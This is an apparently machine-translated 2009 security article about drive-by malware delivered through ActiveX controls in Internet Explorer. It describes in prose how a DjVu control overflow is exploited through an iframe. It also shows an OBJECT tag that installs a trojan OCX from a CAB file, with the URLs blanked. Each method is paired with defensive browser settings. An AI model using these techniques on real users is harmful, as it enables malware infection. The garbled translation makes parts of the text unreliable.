Dissect ActiveX hung it: to install the name of the invasion-bug warning-the black bar safety net

ID MYHACK58:62200922402
Type myhack58
Reporter 佚名
Modified 2009-03-05T00:00:00


Once Upon a time, the use of ActiveX is a rogue software“kill”the main technical means of nowadays malware mostly all dead now, can ActiveX and do not exit People's field of vision, web hang horse took a fancy to it, so ActiveX hung it to pop up and become the important several hung it.

The North Shore team sheets expensive Ling: senior security engineer, engaged in security industry for more than ten years.

ActiveX is a Microsoft developed. Microsoft programmers seem to put the world think too much kindness, that no one will use ActiveX to do evil. Year malware popular of the period, a company called“XX babe video chat”site was using seduce the way, tempting the user to actively install website ActiveX video chat controls.

The ActiveX control will not only take the initiative to track The user network information, but also pop-up ads, upload user Word documents and other rogue behavior. When using the ActiveX evil rogue software more and more, Microsoft in IE7 will reluctantly add on ActiveX authentication measures. Now all the ActiveX in IE7 are first shield, and no longer like the original as the active pop-up installation window.

Small Wikipedia: ActiveX is a Microsoft for a series of strategic object-oriented program technologies and tools of the call, the ActiveX control when in use need to be installed.

Who holding red ActiveX hung it?

In rogueware barbaric growth in those years, the rogueware also like the way bandits bandits the same, often because of competing for the user's computer in the important position and the occurrence of a fire fight, so many used to manufacture the virus of technology is applied to these rogue software. Later the virus has also begun to rogue software to learn, rogueware using some of the technology is also virus used to use, ActiveX hung it should be the virus from rogue software to learn the most thorough techniques.

Encyclopedia: many browser supports ActiveX is not such as IE to get positive, although Firefox, Netscape and other browsers to varying degrees support ActiveX, but the ActiveX appears the most problematic is still the IE browser.

ActiveX will be hung it's use, in fact, the main problem lies in its authentication mechanisms. Early, if on a website there is need to install ActiveX to be able to see something, then when you visit the site, the related ActiveX will repeatedly pop-up prompt asks you to install it, many users often because of various reasons, click“OK”and allow the ActiveX control to install.

It's like you go on the road, there is a group of people says that their intent with you between these people in front of you one after, you can choose to nod in agreement or shake his head in the negative, where you nod in agreement people can become your friends, they can freely in and out of your home. The horror is that some people become your friends after you only to find out he's a thief or rogue rogue.

Currently the use of ActiveX hung it, there are two main forms, one is the use of the normal procedures of the ActiveX vulnerabilities overflow hung it, the other one is to directly write malicious ActiveX Trojans, malicious Trojans disguised as seemingly there is a feature of ActiveX controls, tricking the user to install. The next case we will give everyone demo hack how to use ActiveX to hang the horse.

ActiveX hung it to the offensive and defensive record

Method 1: through the loophole hang horse


Hackers use ActiveX for a web page hang Horse, the most common method is the use of those who have the vulnerability of ActiveX controls to hang horse, by the user system within the existing ActiveX control on the trigger and let the Trojan unknowingly implanted in the user's computer.

Wherein the use of software ActiveX vulnerability attacks famous examples are the Flash and the RealPlayer ActiveX vulnerability hung it to the program, the software of ActiveX vulnerabilities have caused great harm, in particular, is RealPlayer still a hacker at using its ActiveX vulnerabilities hung it on.

Next to the DjVu ActiveX control vulnerability, for example, explain hung it to the specific step, the first malicious code input into WordPad then save as any HTML file, and then use the IFRAME code will generate the HTML file embedded into a normal web page, in this case the input URL is opened containing the DjVu ActiveX control vulnerability in the Web, the native calculator programs will be triggered on. While hacking is usually not so kind, they will be the Shellcode code is modified to download the specified malware code, and then allow the user to open the relevant website after caught.

Little encyclopedia: The DjVu ActiveX control is used to compress the graphics files of the tool, it is in the processing of ultra-long of the ImageURL attribute parameters when there will be overflow.

Anti -

For the use of ActiveX vulnerabilities for hanging horse behavior, the best prevention method is the use of IE outside the browser, such as Firefox, Maxthon or 3 6 0 security browser. In addition, it is best to install anti-hanging horse software.

Method 2: writing ActiveX Trojan


ActiveX Trojan is the use of some of the user blindly clicking on web pop-up the ActiveX ask the Install button of the habits and propagation. Many users are often not able to tell which ActiveX controls are harmless, and which ActiveX controls are harmful.

Those ActiveX Trojans will hit the video chat, Babes Gallery, etc. the temptation of guise, some can not stand the temptation of users will urge to be selectively installed in a web page ActiveX Trojan.

Write ActiveX Trojan, need some programming basis, and the entire process is quite complex, due to layout reasons, here only to you want to become a security engineer friends simply address ActiveX Trojan is substantially the writing process.

First, a hacker will write a Have Download or other malicious functionality of the OCX controls, which are ActiveX Trojans the heart and soul, and then hackers will then write a Setup security settings in the INF file, use the CAB compression tool, for example, WinCAB, the two files are compressed and packaged into a CAB file.

Finally, the hackers upload the file to your own web site, and the web page is written in the call to install the ActiveX control code can be opened wait for the browse the Web the user hooked.

! Analysis ActiveX hung it: to install the name of the invasion

The calling code is as follows:

<OBJECT classid=clsid:68ADAF59-76C1-4 5 6 1-A45A-867F43545237 codeBase= cab#version=1,0,0,0> <PARAM NAME="Setup" VALUE="http:// ocx"> </OBJECT>

This ActiveX Trojan was not the signature verification, usually do not be allowed to install, but there are still ways you can break these security restrictions.


To avoid ActiveX Trojan attacks as long as the Disable ActiveX Trojan to be invoked to run it.

Against this ways to hang Horse the best method or in the client terminal, the client terminal running Internet Explorer, click on“Tools→Internet Options→Security→Custom Level”, the security level defined as“high”, to“ActiveX controls and plug-ins”in Item 2, Item 3 is set to“disable”, the other entry is set to“prompt”, then click“OK”. This setting, when you use IE to browse the web, it can effectively avoid the ActiveX Trojan attacks.

! Analysis ActiveX hung it: to install the name of the invasion